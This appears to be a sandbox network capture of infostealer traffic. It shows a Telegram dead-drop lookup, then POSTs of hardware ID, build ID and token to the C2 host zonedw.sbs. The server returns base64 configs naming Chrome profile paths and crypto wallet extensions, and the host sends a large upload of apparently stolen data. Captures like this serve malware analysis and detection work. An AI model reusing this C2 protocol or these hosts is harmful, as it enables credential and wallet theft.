46	192.168.2.7	50221	149.154.167.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:01 UTC	144	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache Cookie: stel_ssid=0f16be3cd5b64bfc24_1392832568208400914
2024-12-13 17:58:01 UTC	369	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 13 Dec 2024 17:58:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12314 Connection: close Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-13 17:58:01 UTC	12314	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.7	50223	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:03 UTC	230	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.7	50225	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:05 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EUS26XB16P8YM7QQ1VAS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:05 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 37 30 30 39 37 31 45 35 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 2d 2d 0d Data Ascii: ------EUS26XB16P8YM7QQ1VASContent-Disposition: form-data; name="hwid"83700971E58A3788952882-a33c7340-61ca------EUS26XB16P8YM7QQ1VASContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------EUS26XB16P8YM7QQ1VAS--
2024-12-13 17:58:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:06 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|32df704c34ac9e24744a80746960fc1c\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.7	50226	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:08 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EC2N7Q9Z58YMYU37GVSR User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:08 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 Data Ascii: ------EC2N7Q9Z58YMYU37GVSRContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------EC2N7Q9Z58YMYU37GVSRContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------EC2N7Q9Z58YMYU37GVSRCont
2024-12-13 17:58:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:09 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.7	50228	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:10 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5F3EKNYUK6FUAA1DT000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 46 33 45 4b 4e 59 55 4b 36 46 55 41 41 31 44 54 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 35 46 33 45 4b 4e 59 55 4b 36 46 55 41 41 31 44 54 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 46 33 45 4b 4e 59 55 4b 36 46 55 41 41 31 44 54 30 30 30 0d 0a 43 6f 6e 74 Data Ascii: ------5F3EKNYUK6FUAA1DT000Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------5F3EKNYUK6FUAA1DT000Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5F3EKNYUK6FUAA1DT000Cont
2024-12-13 17:58:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:11 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.7	50230	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:12 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----K6PZCBASJEKFU3ECBA1N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:12 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 Data Ascii: ------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------K6PZCBASJEKFU3ECBA1NCont
2024-12-13 17:58:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:13 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.7	50232	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:15 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----U3WL6XBA1N7QIMYMGVS0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 7633 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:15 UTC	7633	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 58 42 41 31 4e 37 51 49 4d 59 4d 47 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 58 42 41 31 4e 37 51 49 4d 59 4d 47 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 58 42 41 31 4e 37 51 49 4d 59 4d 47 56 53 30 0d 0a 43 6f 6e 74 Data Ascii: ------U3WL6XBA1N7QIMYMGVS0Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------U3WL6XBA1N7QIMYMGVS0Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------U3WL6XBA1N7QIMYMGVS0Cont
2024-12-13 17:58:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.7	50233	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:16 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5PPP8YCJW4E37Q1NGLXT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:16 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 Data Ascii: ------5PPP8YCJW4E37Q1NGLXTContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------5PPP8YCJW4E37Q1NGLXTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5PPP8YCJW4E37Q1NGLXTCont
2024-12-13 17:58:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.7	50245	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:18 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-13 17:58:19 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:58:19 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-guHmqGNli6cyCRL0HYpHMQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-13 17:58:19 UTC	124	IN	Data Raw: 39 62 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 62 69 6c 6c 69 65 20 65 69 6c 69 73 68 20 74 69 6e 79 20 64 65 73 6b 20 63 6f 6e 63 65 72 74 22 2c 22 70 68 69 6c 61 64 65 6c 70 68 69 61 20 65 61 67 6c 65 73 20 6a 61 6c 65 6e 20 68 75 72 74 73 22 2c 22 69 70 68 6f 6e 65 20 69 6f 73 20 31 38 2e 32 22 2c 22 63 6f 73 74 63 6f 20 6d 75 66 66 69 6e 73 22 2c 22 62 69 6c 6c 62 Data Ascii: 9b5)]}'["",["billie eilish tiny desk concert","philadelphia eagles jalen hurts","iphone ios 18.2","costco muffins","billb
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 6f 61 72 64 20 6d 75 73 69 63 20 61 77 61 72 64 73 20 32 30 32 34 20 74 61 79 6c 6f 72 20 73 77 69 66 74 22 2c 22 73 61 6e 20 66 72 61 6e 63 69 73 63 6f 20 34 39 65 72 73 22 2c 22 65 6e 72 6f 6e 20 63 65 6f 20 63 6f 6e 6e 6f 72 20 67 61 79 64 6f 73 20 70 69 65 22 2c 22 68 65 6c 6c 64 69 76 65 72 73 20 32 20 69 6c 6c 75 6d 69 6e 61 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 Data Ascii: oard music awards 2024 taylor swift","san francisco 49ers","enron ceo connor gaydos pie","helldivers 2 illuminate"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d"
2024-12-13 17:58:19 UTC	978	IN	Data Raw: 4b 53 6d 6c 6a 4e 47 68 4b 4e 55 35 76 59 55 6c 6b 4e 57 78 6b 54 48 6c 72 4c 30 74 53 62 6b 6b 78 62 6e 49 35 4c 33 5a 68 55 55 63 31 52 6d 56 52 53 6e 41 78 57 45 52 51 57 56 67 76 4d 55 46 49 4f 47 6b 34 51 6c 5a 4d 55 30 68 77 59 6b 46 5a 53 79 74 59 57 45 6c 48 61 7a 5a 77 56 6e 70 6f 51 6b 6c 77 4e 44 42 48 4f 58 52 53 53 7a 68 57 57 56 64 4d 65 57 35 59 4e 6d 5a 50 4e 6c 70 57 62 6c 5a 4c 54 31 4a 59 51 53 39 73 54 33 5a 75 54 6a 4a 43 54 57 6c 42 62 55 74 54 4e 6b 46 71 63 44 4a 35 54 30 70 72 56 56 4e 72 5a 57 52 70 61 6a 5a 77 59 57 64 61 55 45 56 71 53 6c 68 4d 55 30 56 58 54 31 68 33 5a 46 64 77 4e 6a 5a 61 63 47 6c 32 4b 32 46 56 4d 7a 5a 58 4f 48 4e 53 57 57 31 50 62 30 6f 79 4e 6e 4a 72 51 32 74 46 53 47 6f 72 61 55 68 45 61 31 70 77 62 6c Data Ascii: KSmljNGhKNU5vYUlkNWxkTHlrL0tSbkkxbnI5L3ZhUUc1RmVRSnAxWERQWVgvMUFIOGk4QlZMU0hwYkFZSytYWElHazZwVnpoQklwNDBHOXRSSzhWWVdMeW5YNmZPNlpWblZLT1JYQS9sT3ZuTjJCTWlBbUtTNkFqcDJ5T0prVVNrZWRpajZwYWdaUEVqSlhMU0VXT1h3ZFdwNjZacGl2K2FVMzZXOHNSWW1Pb0oyNnJrQ2tFSGoraUhEa1pwbl
2024-12-13 17:58:19 UTC	90	IN	Data Raw: 35 34 0d 0a 51 61 55 46 34 54 56 68 71 4e 54 5a 33 51 6b 52 6c 64 32 56 59 62 6b 5a 4f 56 57 4e 5a 65 54 42 69 53 55 56 48 5a 58 42 77 52 6b 46 79 4c 30 39 56 54 44 6c 43 59 56 41 77 4b 31 46 46 59 33 5a 52 4b 32 56 50 64 32 4e 4c 63 6a 4e 50 53 33 68 36 4d 30 6c 0d 0a Data Ascii: 54QaUF4TVhqNTZ3QkRld2VYbkZOVWNZeTBiSUVHZXBwRkFyL09VTDlCYVAwK1FFY3ZRK2VPd2NLcjNPS3h6M0l
2024-12-13 17:58:19 UTC	685	IN	Data Raw: 32 61 36 0d 0a 31 56 55 4e 44 4e 31 4a 36 5a 7a 4d 72 51 32 46 6d 64 58 56 78 63 6a 5a 4c 62 6a 52 48 63 47 78 35 4e 32 6c 49 61 48 4e 75 52 33 46 6e 55 47 39 34 5a 7a 4d 34 61 46 70 32 64 6c 68 6b 52 44 45 30 52 6b 5a 6a 65 6a 52 34 4e 54 67 77 56 6d 35 6c 64 30 74 34 4e 32 4e 55 65 6b 70 58 54 32 31 50 4d 7a 5a 48 51 31 64 4c 4f 45 31 70 4c 33 70 56 56 46 6c 33 61 69 74 6d 57 6a 4a 49 56 31 70 54 59 30 5a 6a 5a 55 52 30 4e 48 42 71 5a 55 31 71 4e 7a 5a 74 56 30 74 49 5a 6a 64 74 57 56 59 32 54 46 6f 31 4b 30 6c 49 57 47 73 33 4d 31 45 32 4d 6c 64 79 51 33 4e 51 4e 54 4e 58 55 43 39 43 65 6e 56 7a 57 45 34 35 57 6e 46 58 54 46 64 42 51 55 46 42 51 55 56 